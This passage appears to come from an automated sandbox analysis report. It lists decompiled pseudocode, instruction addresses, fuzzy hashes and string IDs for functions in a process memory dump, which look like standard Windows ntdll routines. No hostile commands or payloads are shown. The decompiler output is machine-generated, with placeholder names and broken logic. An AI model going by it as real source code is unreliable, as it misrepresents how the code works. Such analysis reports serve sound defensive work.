				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00FE9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                              0x010251be
                                              0x010251c3
                                              0x010251c8
                                              0x010251cd
                                              0x010251d0
                                              0x010251d3
                                              0x010251d8
                                              0x010251db
                                              0x010251de
                                              0x010251e0
                                              0x010251e3
                                              0x010251e6
                                              0x010251e8
                                              0x01025342
                                              0x01025351
                                              0x01025356
                                              0x0102535a
                                              0x01025360
                                              0x01025363
                                              0x01025366
                                              0x01025369
                                              0x01025369
                                              0x0102536b
                                              0x0102536b
                                              0x01025370
                                              0x010253a3
                                              0x010253a4
                                              0x010253a6
                                              0x010253ab
                                              0x010253ab
                                              0x010253ae
                                              0x010253ae
                                              0x010253b5
                                              0x010253bf
                                              0x010253bf
                                              0x01025375
                                              0x01025396
                                              0x010253a0
                                              0x010253a0
                                              0x00000000
                                              0x01025396
                                              0x01025377
                                              0x01025379
                                              0x0102537f
                                              0x0102538c
                                              0x01025390
                                              0x00000000
                                              0x01025390
                                              0x010251ee
                                              0x010251f1
                                              0x01025301
                                              0x01025310
                                              0x01025315
                                              0x01025318
                                              0x0102531b
                                              0x01025320
                                              0x0102532e
                                              0x01025331
                                              0x00000000
                                              0x01025331
                                              0x01025328
                                              0x01025329
                                              0x00000000
                                              0x01025329
                                              0x010251fa
                                              0x01025235
                                              0x01025236
                                              0x01025239
                                              0x0102523f
                                              0x01025240
                                              0x01025241
                                              0x01025242
                                              0x01025246
                                              0x01025247
                                              0x0102524e
                                              0x01025251
                                              0x01025267
                                              0x01025269
                                              0x0102526e
                                              0x0102527d
                                              0x0102527e
                                              0x01025281
                                              0x01025282
                                              0x01025287
                                              0x01025288
                                              0x0102528a
                                              0x0102528f
                                              0x01025294
                                              0x00000000
                                              0x00000000
                                              0x0102529a
                                              0x0102529c
                                              0x0102529e
                                              0x0102529e
                                              0x010252a4
                                              0x010252b0
                                              0x00000000
                                              0x00000000
                                              0x010252ba
                                              0x010252bc
                                              0x010252bc
                                              0x010252d4
                                              0x010252d9
                                              0x010252dc
                                              0x010252e1
                                              0x00000000
                                              0x00000000
                                              0x010252e7
                                              0x010252f4
                                              0x00000000
                                              0x010252f4
                                              0x01025270
                                              0x00000000
                                              0x01025270
                                              0x010251fc
                                              0x010251fd
                                              0x01025202
                                              0x01025203
                                              0x01025205
                                              0x0102520a
                                              0x0102520f
                                              0x00000000
                                              0x00000000
                                              0x0102521b
                                              0x01025226
                                              0x0102522b
                                              0x0102521d
                                              0x0102521d
                                              0x01025222
                                              0x01025222
                                              0x0102522d
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
                                              • Instruction ID: c0fb75550857f3ec9758cff975de0e1d09d40db1e484b1482e17d0452548bf76
                                              • Opcode Fuzzy Hash: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
                                              • Instruction Fuzzy Hash: B6515C71A006199FDB24DFA88D40BEDBBF8FF49700F14806DE689EB291D7719900DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FAB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E00FAB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x107f7a8);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00FFD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00FED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00FEF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00FFDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00FEB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00FEB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00FEE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00FEA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                              0x00fab171
                                              0x00fab171
                                              0x00fab171
                                              0x00fab171
                                              0x00fab171
                                              0x00fab176
                                              0x00fab17b
                                              0x00fab180
                                              0x00fab186
                                              0x00fab18f
                                              0x00fab198
                                              0x00fab1a4
                                              0x00fab1aa
                                              0x01004802
                                              0x01004802
                                              0x01004805
                                              0x0100480c
                                              0x0100480e
                                              0x00fab1d1
                                              0x00fab1d3
                                              0x00fab1de
                                              0x00fab1de
                                              0x01004817
                                              0x0100481e
                                              0x01004820
                                              0x01004822
                                              0x01004822
                                              0x01004824
                                              0x01004824
                                              0x0100482a
                                              0x00000000
                                              0x00000000
                                              0x01004835
                                              0x0100483a
                                              0x0100483d
                                              0x0100483f
                                              0x01004842
                                              0x01004842
                                              0x01004842
                                              0x01004846
                                              0x0100484c
                                              0x0100484e
                                              0x01004851
                                              0x01004851
                                              0x01004853
                                              0x01004854
                                              0x01004854
                                              0x01004858
                                              0x0100485a
                                              0x0100485a
                                              0x0100485d
                                              0x0100485f
                                              0x01004861
                                              0x01004861
                                              0x01004866
                                              0x0100486b
                                              0x0100486e
                                              0x01004871
                                              0x01004876
                                              0x01004876
                                              0x01004878
                                              0x0100487b
                                              0x01004884
                                              0x01004884
                                              0x00000000
                                              0x0100487d
                                              0x0100487d
                                              0x01004882
                                              0x01004889
                                              0x01004889
                                              0x0100488f
                                              0x01004891
                                              0x010048e0
                                              0x010048e2
                                              0x010048e4
                                              0x010048e4
                                              0x010048e7
                                              0x010048e7
                                              0x010048ed
                                              0x010048f4
                                              0x010048f6
                                              0x01004951
                                              0x01004951
                                              0x01004953
                                              0x01004953
                                              0x01004956
                                              0x01004956
                                              0x01004958
                                              0x01004959
                                              0x01004959
                                              0x0100495d
                                              0x0100495d
                                              0x0100495f
                                              0x0100495f
                                              0x01004965
                                              0x01004969
                                              0x010049ba
                                              0x010049ba
                                              0x010049c1
                                              0x010049c5
                                              0x010049cc
                                              0x010049d4
                                              0x010049d7
                                              0x010049da
                                              0x010049e4
                                              0x010049e5
                                              0x010049f3
                                              0x01004a02
                                              0x00000000
                                              0x01004a02
                                              0x01004972
                                              0x01004974
                                              0x00000000
                                              0x00000000
                                              0x01004976
                                              0x01004979
                                              0x01004982
                                              0x01004983
                                              0x01004984
                                              0x0100498b
                                              0x0100498d
                                              0x01004991
                                              0x01004993
                                              0x01004999
                                              0x0100499d
                                              0x010049a2
                                              0x010049a2
                                              0x010049a2
                                              0x01004999
                                              0x010049ac
                                              0x00000000
                                              0x010049b3
                                              0x010048f8
                                              0x010048fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x010048fe
                                              0x01004895
                                              0x0100489c
                                              0x010048ad
                                              0x010048b2
                                              0x010048b5
                                              0x010048b7
                                              0x010048ba
                                              0x010048bc
                                              0x010048c6
                                              0x010048c6
                                              0x010048cb
                                              0x010048d1
                                              0x010048d4
                                              0x010048d8
                                              0x010048d8
                                              0x00000000
                                              0x010048d8
                                              0x010048be
                                              0x010048c0
                                              0x00000000
                                              0x00000000
                                              0x010048c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x010048c4
                                              0x00000000
                                              0x01004882
                                              0x0100487b
                                              0x01004904
                                              0x01004906
                                              0x00000000
                                              0x00000000
                                              0x01004908
                                              0x0100490e
                                              0x00000000
                                              0x00000000
                                              0x01004910
                                              0x01004917
                                              0x01004917
                                              0x00000000
                                              0x01004917
                                              0x00fab1ba
                                              0x010047f9
                                              0x010047fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x010047fc
                                              0x00fab1c0
                                              0x00fab1c0
                                              0x00fab1c3
                                              0x00fab1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: 41cc6ebf1667e950f531e003fa1e03a784c8ca58a5692853a462bb2afa80c8c9
                                              • Instruction ID: 1b51b70deaf8e75e5588aca68e791f3f0e17b94b16452cc5f243cf61c28fcd2a
                                              • Opcode Fuzzy Hash: 41cc6ebf1667e950f531e003fa1e03a784c8ca58a5692853a462bb2afa80c8c9
                                              • Instruction Fuzzy Hash: 7451E071D002598EEB32CF688845BAEBBF1BF00310F1041ADEA99EB2C2D7754A45DB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FCB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FCB9A5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: ab5c4a6b81f707c3596791bf78fd8ea1bb0faf48501c26ff2e785176e0ac5823
                                              • Instruction ID: 6f3f4f3bb176aefd2e3abb31d454bc7191258158cb0d87df29bf7b55e483fe48
                                              • Opcode Fuzzy Hash: ab5c4a6b81f707c3596791bf78fd8ea1bb0faf48501c26ff2e785176e0ac5823
                                              • Instruction Fuzzy Hash: CA516975A08346CFC720CF69C582A2ABBE5BB88710F24896EF9D587345D735EC40DB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FD2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: 99382d699c1c934c7e2b2474ad3a3c83ddcaec9f114e0a29c50607c621cbcf00
                                              • Instruction ID: 31b9b8065c93631599cabb88d6700fc9ffe4e78571afbf1d1a7510d063ab44c1
                                              • Opcode Fuzzy Hash: 99382d699c1c934c7e2b2474ad3a3c83ddcaec9f114e0a29c50607c621cbcf00
                                              • Instruction Fuzzy Hash: 91C19271E00219DFCB65DF99DC91BADBBB2FF59710F18402AE441AB350D738A941EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FDFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                              Download Yara Rule
                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0101BE0F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: 81726e878ee56934741d7e8d9e092df6de7b9dfdbe6801b3c68faf95a64f22dc
                                              • Instruction ID: 600136efbd0ab8d9c2e886aa67ec98a716a0a6ba9fda93369e76f2d9bca456bc
                                              • Opcode Fuzzy Hash: 81726e878ee56934741d7e8d9e092df6de7b9dfdbe6801b3c68faf95a64f22dc
                                              • Instruction Fuzzy Hash: 56A11832B106068BDB25DB68C850BBA77F6AF44720F08457BE947CB781DB38D905EB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FA2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: 964a1afc48e46ed2c8357f1bc76c2d4170c000e426713272d968acef6799dda2
                                              • Instruction ID: 6ad124574815ed1958ea78e36f273f5742967e7c4ef22d4a3e19f7ce68f47b8a
                                              • Opcode Fuzzy Hash: 964a1afc48e46ed2c8357f1bc76c2d4170c000e426713272d968acef6799dda2
                                              • Instruction Fuzzy Hash: 976144B1F00209AFCB32DB6CC880B7E77A5EF41320F2402A9E955A72E1C7789D44B791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01070EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: f7f04bc9d1e18e0ee936668445250686cbf48b0816b2d77b81447576e92abe94
                                              • Instruction ID: c13a7947ee74c399f5b370b8ea78c4d7c2476d16fb5a6cfb8e8e865ebbe6a827
                                              • Opcode Fuzzy Hash: f7f04bc9d1e18e0ee936668445250686cbf48b0816b2d77b81447576e92abe94
                                              • Instruction Fuzzy Hash: 1251CE707043428FD365DF28D880B1BBBE5EBC5300F040A6CFA8697290D671E805CB66
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FDF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: fd6ae16ba542979173b3be8fface78b2749fa915ad0d3452dcc3924ca003f452
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: 4C517A725047119BC321DF29C841A6BBBF5BF48710F008A2EF99687690E7B4E904DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01023540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: 97e59eac76aab129a56d72a86e71ee389ca9ac4e70b53344c84c23a5db933507
                                              • Instruction ID: 68c9fb18ca7ab985dd334a21e120561ea123f977db5e9998841c0152d655641d
                                              • Opcode Fuzzy Hash: 97e59eac76aab129a56d72a86e71ee389ca9ac4e70b53344c84c23a5db933507
                                              • Instruction Fuzzy Hash: 934164B1D0012D9ADB219A50CC85FDEB77CAB48714F0085E5EA48AB241DB759E888FA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 010705AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: ec1a69f7223f70614d32d0b3d449703c083495eeb26c294545a167e5f95f4065
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: CB311372B04346ABE710DE28CC45F9B7BD9ABC8754F144228FA84EB284D770E914CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01023884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryName
                                              • API String ID: 0-215506332
                                              • Opcode ID: 1793c34798982e3c276baa6708e15c20ecba31e62464ff1af70ddd977ce14986
                                              • Instruction ID: f67f256d2f89423844f45de5ff0403199008cea203e1661b858d668350b1bf2d
                                              • Opcode Fuzzy Hash: 1793c34798982e3c276baa6708e15c20ecba31e62464ff1af70ddd977ce14986
                                              • Instruction Fuzzy Hash: AD310872A0062AAFDB15DA58C946E6FB7B4FB45B20F014169E984AB241D7359E00CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FDD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 71d1d06d39c7b9229714dc30bd6e4fae740ac56646f883e7c02ce80d0cfc6879
                                              • Instruction ID: 45d8ebc2854beea0a1a59e1e55d446980c788cff2e8f4bdcf9b3d2f71d6f8abd
                                              • Opcode Fuzzy Hash: 71d1d06d39c7b9229714dc30bd6e4fae740ac56646f883e7c02ce80d0cfc6879
                                              • Instruction Fuzzy Hash: 5C31AFB2508345AFC321DF28C981A6BBBE9EB85754F48092EF99483350D635DD04EB93
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FB1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: e194e7ccd46af3e55f93fe52725750c16a2c53e4183eab3162cbfa7c559935e8
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: 4F21F8B7941228EBDB22DA5A8850FDBBBADBF41760F554465F9448B200D634EC00FBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FCF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: 23191180a5136edc410d1c25714d6faa2c1b8025a9cc457777043744d26b6457
                                              • Instruction ID: e26596448174b026cf1d9aaf9ed56613a4ef6b977ce07328c622cbd3d877d537
                                              • Opcode Fuzzy Hash: 23191180a5136edc410d1c25714d6faa2c1b8025a9cc457777043744d26b6457
                                              • Instruction Fuzzy Hash: 0D117C36B046038BEB244F1D8692F26F697AF95724F34453EE461CB791DA65CC48B340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01058DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              Strings
                                              • Critical error detected %lx, xrefs: 01058E21
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
                                              • Instruction ID: 29f2fc5dd5446e3cc604be350983eb5c99c440754e8c8d200076ce1963a2bb45
                                              • Opcode Fuzzy Hash: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
                                              • Instruction Fuzzy Hash: 4911AD71D04348DBDF25DFA989067EDBBB1BF04310F20825EE9A96B2A2C3340601EF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0103FF60
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
                                              • Instruction ID: 33a45d0ded1e3f6a6f3e6eba89f0312dc335e920f57dc785d7d3f0dd45b1d48b
                                              • Opcode Fuzzy Hash: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
                                              • Instruction Fuzzy Hash: 4111E171910148EFEF62EB54CC49F98BBB2BF44714F148094F6496B2A1C7399940EB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01075BA5, Relevance: .6, Instructions: 592COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
                                              • Instruction ID: e7ce5ac61d441f9dfd2395dce97282e8276913c7dba6d8a88732b50a2481031d
                                              • Opcode Fuzzy Hash: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
                                              • Instruction Fuzzy Hash: AE424871D006298FEB64CF68C881BA9BBF1FF49304F1481EAD98DAB242D7359985CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FC4120, Relevance: .4, Instructions: 444COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
                                              • Instruction ID: a1878288246bbdebd9b97f62bcf65f298ced8922cda3a443e262be1ead325610
                                              • Opcode Fuzzy Hash: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
                                              • Instruction Fuzzy Hash: 40F1AE719082528FD729CF19C592B7AB7E1FF88714F14496EF886C7290E734E881EB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FD20A0, Relevance: .4, Instructions: 420COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 334f0a89cf16c8adb20fc7befeb5719b00b52a95fd06ca1b54e4efd7efa47faa
